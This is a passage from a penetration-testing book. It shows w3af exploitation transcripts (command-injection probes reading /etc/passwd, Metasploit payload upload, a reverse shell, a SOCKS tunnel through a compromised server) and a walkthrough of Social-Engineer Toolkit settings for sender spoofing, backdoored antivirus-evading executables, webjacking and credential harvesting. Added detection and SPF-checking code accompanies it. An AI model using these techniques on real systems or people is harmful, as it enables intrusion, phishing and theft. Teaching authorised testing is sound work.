Table: agenda [2 entries]
+---------------+----+--------+----------+-------------------+
| direccion     | id | nombre | telefono | email             |
+---------------+----+--------+----------+-------------------+
| direccion 123 | 1  | apr    | 52365786 | [email protected] |
| direccion 333 | 2  | vico   | 47998123 | [email protected] |
+---------------+----+--------+----------+-------------------+
w3af/exploit/sqlmap>>>
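Seen from the web server, the scans and exploits in this chapter leave distinctive traces: w3af sends its requests with the User-agent “w3af.sourceforge.net” (see the HTTP log earlier), and the osCommanding plugin's probes (“ping -c N localhost” above, and the “type %SYSTEMROOT%\win.ini” and “/bin/cat /etc/passwd” probes in the sessions that follow) arrive as parameter values. The following added example (not w3af's code) checks Apache combined-format access log lines for those traces; the log lines are constructed for this example.

```python
# Added example (not w3af's own code): detection logic for the server side of the scans
# shown in this chapter. It parses Apache combined-format access log lines, decodes the
# query string the way the vulnerable script would, and flags the w3af User-agent and the
# osCommanding probe strings that appear on this page. SAMPLE_LINES are constructed.
import re
from urllib.parse import urlsplit, parse_qsl

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

SCANNER_UA = "w3af.sourceforge.net"

# (label, pattern applied to each DECODED parameter value)
PROBE_PATTERNS = [
    ("os-cmd ping probe", re.compile(r"\bping\s+-c\s+\d+\s+localhost\b")),
    ("os-cmd win.ini read", re.compile(r"\btype\s+%SYSTEMROOT%\\win\.ini", re.I)),
    ("os-cmd passwd read", re.compile(r"/bin/cat\s+/etc/passwd")),
]

SAMPLE_LINES = [  # constructed; modelled on the requests shown in this chapter
    '10.0.0.5 - - [14/Sep/2008:17:36:09 -0300] "GET /w3af/osCommanding/vulnerable.php?command=f0as9 HTTP/1.1" 200 512 "-" "w3af.sourceforge.net"',
    '10.0.0.5 - - [14/Sep/2008:17:36:12 -0300] "GET /w3af/osCommanding/vulnerable.php?command=+ping+-c+9+localhost HTTP/1.1" 200 1024 "-" "w3af.sourceforge.net"',
    '10.0.0.7 - - [14/Sep/2008:17:40:01 -0300] "GET /os.php?cmd=type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [14/Sep/2008:17:41:30 -0300] "GET /w3af/v.php?c=%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1" 200 1800 "-" "Mozilla/5.0"',
    '192.168.1.20 - - [14/Sep/2008:17:42:00 -0300] "GET /index.php?page=home HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def decoded_params(target):
    """Return [(name, value)] with '+' and percent-encoding decoded, as PHP sees them."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def classify(line):
    """Return the list of finding labels for one access-log line (empty = clean)."""
    m = ACCESS_RE.match(line)
    if not m:
        return ["unparsable line"]
    findings = []
    if SCANNER_UA in m.group("ua"):
        findings.append("w3af user-agent")
    for name, value in decoded_params(m.group("target")):
        for label, pattern in PROBE_PATTERNS:
            if pattern.search(value):
                findings.append("%s in parameter %r" % (label, name))
    return findings


def scan(lines):
    """Map each source IP with at least one finding to its accumulated findings."""
    hits = {}
    for line in lines:
        findings = classify(line)
        if findings:
            m = ACCESS_RE.match(line)
            ip = m.group("ip") if m else "?"
            hits.setdefault(ip, []).extend(findings)
    return hits
```

Note that a scanner can trivially change its User-agent, so the parameter-value patterns, which reflect what the probe has to contain to work, are the durable signal.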

Advanced exploiting techniques

The framework implements two highly advanced exploiting techniques that allow the user to keep escalating privileges into the remote network. Both of these techniques are used once the framework is able to execute remote operating system commands; this is the case of (for example) the osCommanding, remoteFileIncludeShell and davShell attack plugins. These exploiting techniques are:

● Virtual daemon, which allows you to use metasploit payloads to exploit the server that supports a vulnerable web application.
● w3afAgent, which creates a tunnel between the compromised server and w3af, to allow the user to route TCP connections through the remote server.

Both of them are simple to use and configure using this guide. These features are under heavy development and are by no means stable; use them at your own risk.

Virtual daemon

As said before, this feature allows you to use metasploit payloads to exploit the server that supports a vulnerable web application. To use this feature you must have a working installation of the metasploit framework version 3.0 or greater; you can get it for free at www.metasploit.com. The installation and configuration of MSF is out of the scope of this document. To be able to use the virtual daemon you will need to run the following command in order to copy the w3af metasploit module into the MSF directory:

./w3af_console -i /home/jdoe/tools/msf/

Where “/home/jdoe/tools/msf/” is the directory where the user “jdoe” installed Metasploit. In case you are interested, this is just a fancy shortcut for “cp core/controllers/vdaemon/w3af_vdaemon.rb /home/user/tools/msf/modules/exploits/unix/misc/”. Once this has been done, the user can start using the virtual daemon feature. Before going through an example to see how to use the feature, we will make a summary of the steps that happen during the exploitation:

1. w3af finds a vulnerability that allows remote command execution
2. The user exploits the vulnerability and starts the virtual daemon
3. The user starts the metasploit framework
4. The user configures the w3af module inside MSF and executes it
5. The w3af module inside MSF connects to the virtual daemon that is listening on localhost
6. MSF sends the payload selected by the user to the virtual daemon
7. The virtual daemon creates a PE (portable executable) or an ELF (executable and linkable format) file depending on the remote operating system, and using the exploited vulnerability it uploads and executes the payload on the remote server
8. The process of uploading the file to the remote server depends on the remote operating system, the privileges of the user running w3af and the local operating system; but in most cases the following happens:
   ● w3af sends a small executable to the remote server to perform an extrusion scan.
   ● w3af sniffs on the configured interface (misc-settings -> interface) for packets that arrive on the expected ports in order to verify outgoing firewall rules on the remote network.
   ● If a TCP port is found to be allowed in the remote firewall, w3af will try to run a server on that port and make a reverse connection from the compromised host in order to download the generated PE/ELF file. If no TCP ports are enabled, w3af will send the ELF/PE file to the remote server using several calls to the “echo” command, which is rather slow, but should always work because it's an in-band transfer method.
9. The payload runs on the remote server and possibly connects back to the metasploit framework, which will handle the rest of the exploitation.

Now that we know the theory, let's see an example of what this feature can do:

$ ./w3af_console
w3af>>> plugins
w3af/plugins>>> audit osCommanding
w3af/plugins>>> audit
Enabled audit plugins:
osCommanding
w3af/plugins>>> back
w3af>>> target
w3af/target>>> set target http://172.16.1.128/os.php?cmd=f00
w3af/target>>> back
w3af>>> start
The list of found URLs is:
- http://172.16.1.128/os.php
Found 1 URLs and 1 different points of injection.
The list of Fuzzable requests is:
- http://172.16.1.128/os.php | Method: GET | Parameters: (cmd)
Starting osCommanding plugin execution.
OS Commanding was found at: http://172.16.1.128/os.php . Using method: GET. The data sent was: cmd=type+%25SYSTEMROOT%25%5Cwin.ini
The vulnerability was found in the request with id 7.
w3af>>> exploit
w3af/exploit>>> exploit osCommandingShell
osCommanding exploit plugin is starting.
The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
Vulnerability successfully exploited.
Execute "exitPlugin" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server.
w3af/exploit/osCommandingShell>>> start vdaemon
Virtual daemon service is running on port 9091, use metasploit's w3af_vdaemon module to exploit it.
w3af/exploit/osCommandingShell>>>

Nothing special for now; we just added the new “start vdaemon” command. With this w3af run we have covered items 1 and 2 of the theory. The next step is to configure the MSF module and run it; my preferred way is to use metasploit's web interface “msfweb”. The first step is to click on the “Exploit” button on the main menu; a small window will appear, there you should search for w3af and then select the exploit named “w3af virtual daemon exploit”. Some important points to have in mind while configuring the w3af virtual daemon module inside MSF:

● The target is of course the remote operating system you are exploiting
● VNC payloads don't seem to work
● RHOST indicates the IP address of the server you are exploiting
● LHOST is your public IP address
● LPORT is a port where the remote web server can connect to (when using reverse connect payloads) or you can connect to (when using bind payloads)
● The w3af module inside metasploit will connect to localhost:9091 and do all the payload transfer; these parameters can't be configured and must not be confused with RHOST/LHOST and LPORT

Once it has been configured, we can click on “Launch Exploit” to start the process. This is what we will see in the w3af console:

w3af/exploit/osCommandingShell>>>

Please wait some seconds while w3af performs an extrusion scan.
The extrusion test failed, no reverse connect transfer methods can be used.
Trying inband echo transfer method.
Error: The user running w3af can't sniff on the specified interface. Hints: Are you root? Does this interface exist?
Successfully transfered the MSF payload to the remote server.
Successfully executed the MSF payload on the remote server.

The last messages are printed when you run w3af as a normal user; the reason is simple: when you run w3af as a user you can't sniff and therefore can't perform a successful extrusion scan. A successful extrusion scan would look like:

Please wait some seconds while w3af performs an extrusion scan.
ExtrusionServer listening on interface: eth1
Finished extrusion scan.
The remote host: "172.10.10.1" can connect to w3af with these ports:
- 25/TCP
- 80/TCP
- 53/TCP
- 1433/TCP
- 8080/TCP
- 53/UDP
- 69/UDP
- 139/UDP
- 1025/UDP
The following ports are not bound to a local process and can be used by w3af:
- 25/TCP
- 53/TCP
- 1433/TCP
- 8080/TCP
Selecting port "8080/TCP" for inbound connections from the compromised server to w3af.

And if we take a look at the metasploit web interface we will find something far more interesting:

[*] Started reverse handler
[*] The remote IP address is: 172.16.1.128
[*] Using remote IP address to create payloads.
[*] Sent payload to vdaemon.
[*] The estimated time to wait for the extrusion scan to complete is: 1 seconds.
[*] Done waiting!
[*] The estimated time to wait for PE/ELF transfer is: 8 seconds.
[*] Waiting...
[*] Done waiting!
[*] Going to wait for 27 seconds (waiting for crontab/at to execute payload).
[*] The session could start before the handler, so please *be patient*.
[*] Command shell session 1 opened (172.16.1.1:4444 -> 172.16.1.128:1047)
[*] Done waiting!
[*] Starting handler
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Now the user has an interactive shell with the privileges of the user running the web server, which can be used without any restrictions; you could even close w3af now and continue working directly from the metasploit shell.

w3afAgent

As said before, this feature allows you to create a reverse tunnel that will route TCP connections through the compromised server. Unlike virtual daemon, this feature is ready to use and doesn't require any other software. Before going through an example to see how to use this feature, we will make a summary of the steps that happen during exploitation:

1. w3af finds a vulnerability that allows remote command execution
2. The user exploits the vulnerability and starts the w3afAgent
3. w3af performs an extrusion scan by sending a small executable to the remote server. This executable connects back to w3af and allows the framework to identify outgoing firewall rules on the remote network.
4. w3afAgent Manager sends a w3afAgentClient to the remote server. The process of uploading the file to the remote server depends on the remote operating system, the privileges of the user running w3af and the local operating system; but in most cases the following happens:
   ● w3af reuses the information from the first extrusion scan, which was performed in step 3, in order to know which port it can use to listen for connections from the compromised server.
   ● If a TCP port is found to be allowed in the remote firewall, w3af will try to run a server on that port and make a reverse connection from the compromised host in order to download the generated PE/ELF file. If no TCP ports are enabled, w3af will send the ELF/PE file to the remote server using several calls to the “echo” command, which is rather slow, but should always work because it's an in-band transfer method.
5. w3afAgent Manager starts the w3afAgentServer, which binds on localhost:1080 (which will be used by the w3af user) and on the interface configured in w3af (misc-settings -> interface) on the port discovered during step 3.
6. The w3afAgentClient connects back to the w3afAgentServer, successfully creating the tunnel
7. The user configures the proxy listening on localhost:1080 in his preferred software
8. When the program connects to the socks proxy, all outgoing connections are routed through the compromised server

Now that we know the theory, let's see an example of what this feature can do:

$ ./w3af_console
w3af>>> plugins
w3af/plugins>>> audit osCommanding
w3af/plugins>>> audit
Enabled audit plugins:
osCommanding
w3af/plugins>>> back
w3af>>> target
w3af/target>>> set target http://172.10.10.1/w3af/v.php?c=list
w3af/target>>> back
w3af>>> start
The list of found URLs is:
- http://172.10.10.1/w3af/v.php
Found 1 URLs and 1 different points of injection.
The list of Fuzzable requests is:
- http://172.10.10.1/w3af/v.php | Method: GET | Parameters: (c)
Starting osCommanding plugin execution.
OS Commanding was found at: http://172.10.10.1/w3af/v.php . Using method: GET. The data sent was: c=%2Fbin%2Fcat+%2Fetc%2Fpasswd
The vulnerability was found in the request with id 2.
w3af>>> exploit
w3af/exploit>>> exploit osCommandingShell
osCommanding exploit plugin is starting.
The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
Vulnerability successfully exploited.
Execute "exitPlugin" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server.

Nothing really new until now: we configured w3af, started the scan and exploited the vulnerability.

w3af/exploit/osCommandingShell>>> start w3afAgent

Initializing w3afAgent system, please wait.
Please wait some seconds while w3af performs an extrusion scan.
The extrusion scan failed.
Error: The user running w3af can't sniff on the specified interface. Hints: Are you root? Does this interface exist?
Using inbound port "5060" without knowing if the remote host will be able to connect back.

The last messages are printed when you run w3af as a normal user; the reason is simple: when you run w3af as a user you can't sniff and therefore can't perform a successful extrusion scan. A successful extrusion scan would look like:

Please wait some seconds while w3af performs an extrusion scan.
ExtrusionServer listening on interface: eth1
Finished extrusion scan.
The remote host: "172.10.10.1" can connect to w3af with these ports:
- 25/TCP
- 80/TCP
- 53/TCP
- 1433/TCP
- 8080/TCP
- 53/UDP
- 69/UDP
- 139/UDP
- 1025/UDP
The following ports are not bound to a local process and can be used by w3af:
- 25/TCP
- 53/TCP
- 1433/TCP
- 8080/TCP
Selecting port "8080/TCP" for inbound connections from the compromised server to w3af.

In both cases (superuser and user), these should be the following steps:

Starting w3afAgentClient upload.
Finished w3afAgentClient upload.
Please wait 30 seconds for w3afAgentClient execution.
w3afAgent service is up and running.

You may start using the w3afAgent that is listening on port 1080. All connections made through this SOCKS daemon will be relayed using the compromised server. And now, from another console we can use a socksClient to route connections through the compromised server:

$ nc 172.10.10.1 22
(UNKNOWN) [172.10.10.1] 22 (ssh) : Connection refused

$ python socksClient.py 127.0.0.1 22
SSH-2.0-OpenSSH_4.3p2 Debian-8ubuntu1
Protocol mismatch.

$ cat socksClient.py
# Connect to host:port through the SOCKS4 proxy that w3afAgent exposes on localhost:1080
# (SocksiPy defaults to port 1080 when none is given), send a newline and print the banner.
# Uses the SocksiPy module bundled with w3af (extlib/socksipy), so run it from the w3af directory.
import sys
import extlib.socksipy.socks as socks

s = socks.socksocket()
s.setproxy(socks.PROXY_TYPE_SOCKS4, "localhost")
s.connect((sys.argv[1], int(sys.argv[2])))
s.send(b'\n')
print(s.recv(1024))

I think this has given you an overview of a framework which is as handy as Burp Suite.

It should be mentioned that in this section, ‘I’ refers to Mr. Andres Riancho.

Chapter 4: Social Engineering Tools

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester's arsenal. SET was written by David Kennedy (ReL1K) and, with a lot of help from the community, it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

Beginning with the Social Engineer Toolkit

The brains behind SET is its configuration file. By default SET works well for most people; however, advanced customization may be needed to ensure that the attack vectors go off without a hitch. The first thing to do is ensure that you have updated SET, from its directory:

root@bt:/pentest/exploits/SET# svn update
U    src/payloadgen/payloadgen.py
U    src/java_applet/Java.java
U    src/java_applet/jar_file.py
U    src/web_clone/cloner.py
U    src/msf_attacks/create_payload.py
U    src/harvester/scraper.py
U    src/html/clientside/gen_payload.py
U    src/html/web_server.py
U    src/arp_cache/arp_cache.py
U    set
U    readme/CHANGES
Updated to revision 319.
root@bt:/pentest/exploits/SET#

Once you've updated to the latest version, start tweaking your attack by editing the SET configuration file. Let's walk through each of the flags:

root@bt:/pentest/exploits/set# nano config/set_config

# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3

Looking through the configuration options, you can change specific fields to get a desired result. The first option sets the path to the Metasploit installation. Metasploit is used for payload creation, file format bugs, and the browser exploit sections.

# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap

The Ettercap section can be used when you're on the same subnet as the victims and you want to perform DNS poisoning attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site, or all sites, to your running malicious server.

# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF

Setting the SENDMAIL flag to ON will try starting SENDMAIL, which can spoof source email addresses. This attack only works if the victim's SMTP server does not perform reverse lookups on the hostname. SENDMAIL must be installed. If you're using BackTrack 4, it is installed by default.
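The spoofed sender only gets through when the receiving mail server does not verify the sending host, and the standard receiver-side check for that is an SPF lookup on the MAIL FROM domain. The following added example (not SET's code and not from the book) evaluates the ip4 and all mechanisms of an SPF record against a connecting IP; the domains, records and addresses are constructed, and include/a/mx mechanisms, which need live DNS, are deliberately left unsupported.

```python
"""Minimal SPF (RFC 7208) evaluation of the ip4 and all mechanisms.
Added example, not SET's code: the receiver-side check that defeats a
spoofed envelope sender. Records and domains below are constructed."""
import ipaddress

# Constructed records: what a TXT lookup for each domain might return.
SPF_RECORDS = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 ip4:198.51.100.10 -all",
    "softfail.example": "v=spf1 ip4:203.0.113.0/28 ~all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}

def check_spf(record, sender_ip):
    """Return pass/fail/softfail/neutral/none for sender_ip against record."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"                          # no usable SPF policy
    ip = ipaddress.ip_address(sender_ip)
    for term in terms[1:]:
        qualifier = "+"                        # RFC default qualifier
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name == "all":
            return QUALIFIERS[qualifier]
        if name == "ip4" and arg:
            net = ipaddress.ip_network(arg, strict=False)
            if ip.version == 4 and ip in net:
                return QUALIFIERS[qualifier]
        # include/a/mx/exists need DNS and are skipped here rather than guessed.
    return "neutral"                           # record ended without "all"

def envelope_sender_allowed(mail_from, sender_ip, records=SPF_RECORDS):
    """Decide whether to accept MAIL FROM <mail_from> from sender_ip.
    Only 'pass' is accepted; every other result is returned for logging."""
    domain = mail_from.rsplit("@", 1)[-1].lower()
    record = records.get(domain)
    result = check_spf(record, sender_ip) if record else "none"
    return result, result == "pass"
```

A mail claiming to be from example.com but arriving from an address outside the published ranges evaluates to fail and is refused, which is exactly the case the SENDMAIL flag relies on being unchecked.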

# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
WEBATTACK_EMAIL=OFF

Setting WEBATTACK_EMAIL to ON allows you to send mass emails to the victims while utilizing the Web Attack vector. Traditionally the emailing aspect is only available through the spear-phishing menu; when this is enabled it adds the ability to email victims with links in support of your attacks.

# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
# INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF

The Java Applet Attack vector is the attack with one of the highest rates of success that SET has in its arsenal. To make the attack look more believable, you can turn this flag on, which will allow you to sign the Java Applet with whatever name you want. Say you're targeting CompanyX: the standard Java Applet is signed by Microsoft, but you can sign the applet with CompanyX to make it look more believable. This will require you to install Java's JDK (in Ubuntu it's apt-get install sun-java6-jdk or openjdk-6-jdk).

# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON

The AUTO_DETECT flag is probably the source of the most frequently asked questions about SET. In most cases, SET will grab the interface you use to connect out to the Internet and use that as the reverse connection interface and IP address. Many attacks need to be customized and may not take place on the internal network. If you turn this flag to OFF, SET will prompt you with additional questions when setting up the attack. Turn it OFF when you want to use multiple interfaces, have an external IP, or you're in a NAT/port forwarding scenario.

# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK
# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.
WEB_PORT=80

By default the SET web server listens on port 80; if for some reason you need to change this, you can specify an alternative port.

# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV
# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE
# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
CUSTOM_EXE=src/exe/legit.binary

When using the payload encoding options of SET, the best option for anti-virus bypass is the backdoored executable option, in which a legitimate exe is loaded with a hidden malicious payload. Specifically, an exe is backdoored with a Metasploit-based payload and can generally evade most AVs out there. SET has an executable built into it for the backdooring; however, if for some reason you want to use a different executable, you can specify the path to that exe with the CUSTOM_EXE flag.

# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www

The web server utilized within SET is a custom-coded web server that at times can be somewhat slow, depending on load. If you find that you need a boost and want to utilize Apache, you can flip this switch to ON and it will use Apache to handle the web requests and speed your attack up. Note that this only works with the Java Applet and Metasploit-based attacks. Because they have to intercept posted credentials, the web jacking, tabnabbing, and credential harvester attack methods cannot be used with Apache.

# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
#
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
#
SELF_SIGNED_CERT=OFF
#
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem

In some cases, when you're performing an advanced social-engineering attack, you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL-based attacks with SET. You will need to turn WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well; however, there will be an "untrusted" warning when a victim goes to your website.

# TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW
# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
WEBJACKING_TIME=2000

The webjacking attack is performed by replacing the victim's browser window with another window that is made to look like a legitimate site. This attack is very dependent on timing: if you're doing it over the Internet, I recommend the delay be 5000 (5 seconds); if you're on the internal network, 2000 (2 seconds) is probably a safe bet.

SET's Menu

SET is a menu-driven attack system, which is fairly unique when it comes to hacker tools. The decision not to make it command-line driven was made because of how social-engineering attacks occur: they require multiple scenarios, options, and customizations. If the tool had been command-line based, it would have really limited the effectiveness of the attacks and the ability to fully customize them for your target. Let's dive into the menu and do a brief walkthrough of each attack vector.

root@bt:/pentest/exploits/set# ./set

[---] The Social-Engineer Toolkit (SET) [---]
[---] Written by David Kennedy (ReL1K) [---]
[---] Version: 0.7 [---]
[---] Codename: 'Swagger Wagon' [---]
[---] Report bugs to: [email protected] [---]
[---] Java Applet Written by: Thomas Werth [---]
[---] Homepage: http://www.secmaniac.com [---]
[---] Framework: http://www.social-engineer.org [---]
[---] Over 1 million downloads and counting. [---]

Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs..

Follow me on Twitter: dave_rel1k

DerbyCon 2011 Sep29-Oct02 - A new era begins... irc.freenode.net - #DerbyCon - http://www.derbycon.com

Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is installed (it is installed in BT4) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice:

The spear-phishing attack menu is used for performing targeted email attacks against a victim. You can send multiple emails based on what you have harvested, or you can send them to individuals. You can also utilize a fileformat bug (for example a PDF bug) and send the malicious attachment to the victim in order to hopefully compromise the system.

Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit

Enter your choice: 2

The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Enter what type of attack you would like to utilize.

The Java Applet attack will spoof a Java Certificate and deliver a Metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit browser exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

The TabNabbing Method will wait for a user to move to a different tab, then refresh the page to something different.

The Man Left in the Middle Attack Method was introduced by Kos and utilizes HTTP REFERER's in order to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate